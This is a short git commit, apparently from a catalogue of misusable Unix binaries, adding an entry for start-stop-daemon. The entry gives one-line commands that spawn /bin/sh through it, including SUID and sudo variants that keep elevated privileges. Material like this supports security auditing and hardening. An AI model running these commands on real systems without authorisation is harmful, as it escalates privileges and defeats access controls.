Add start-stop-daemon

This commit is contained in:
egre55 2018-11-05 15:34:57 +00:00 committed by Andrea Cardaci
parent ae79cfa550
commit 86e249e812

View File

@ -0,0 +1,11 @@
---
functions:
shell:
- code: start-stop-daemon -n $RANDOM -S -x /bin/sh
suid:
- code: |
./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
sudo:
- code: |
sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
---